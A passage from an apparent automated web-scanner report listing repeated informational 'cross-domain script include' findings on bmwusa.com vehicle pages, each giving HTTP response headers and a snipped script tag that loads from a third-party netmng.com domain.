Date: Fri, 21 Jan 2011 21:03:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:26 GMT;path=/
Content-Length: 202293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.152. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:20 GMT;path=/
Content-Length: 202294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.153. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivegt/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:01 GMT;path=/
Content-Length: 214718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.154. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:21 GMT;path=/
Content-Length: 228470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.155. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:21 GMT;path=/
Content-Length: 228471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.156. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:16 GMT;path=/
Content-Length: 214442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.157. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:04 GMT;path=/
Content-Length: 214443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.158. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/5seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivesedan/5seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:49:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:09:28 GMT;path=/
Content-Length: 202171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.159. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivesedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:48:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:08:12 GMT;path=/
Content-Length: 214705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.160. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:51:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:11:04 GMT;path=/
Content-Length: 227207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.161. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivesedan/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:50:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:10:42 GMT;path=/
Content-Length: 227208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.162. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:49:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:09:01 GMT;path=/
Content-Length: 215752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.163. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550ixdrivesedan/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:48:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:08:25 GMT;path=/
Content-Length: 215753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.164. http://www.bmwusa.com/standard/content/vehicles/2011/5/5explore.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/5explore.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:38:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:39 GMT;path=/
Content-Length: 180004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</div><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.165. http://www.bmwusa.com/standard/content/vehicles/2011/5/5granturismoexplore.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/5granturismoexplore.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:51:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:11:42 GMT;path=/
Content-Length: 180239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.166. http://www.bmwusa.com/standard/content/vehicles/2011/5/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:38:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:31 GMT;path=/
Content-Length: 202396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.167. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740isedan/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:36 GMT;path=/
Content-Length: 202156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.168. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740isedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:09:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:29:36 GMT;path=/
Content-Length: 212832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.169. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740isedan/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:24 GMT;path=/
Content-Length: 212833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.170. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:07:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:27:21 GMT;path=/
Content-Length: 227187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.171. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740isedan/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:47 GMT;path=/
Content-Length: 227188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.172. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:35 GMT;path=/
Content-Length: 215341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.173. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740isedan/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:06:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:26:30 GMT;path=/
Content-Length: 215342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.174. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740lisedan/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:10:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:29 GMT;path=/
Content-Length: 202193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.175. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740lisedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:11:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:31:18 GMT;path=/
Content-Length: 212920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.176. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740lisedan/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:09:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:29:48 GMT;path=/
Content-Length: 212921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.177. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:11:09 GMT
Connection: close
Connection: Transfer-Encoding
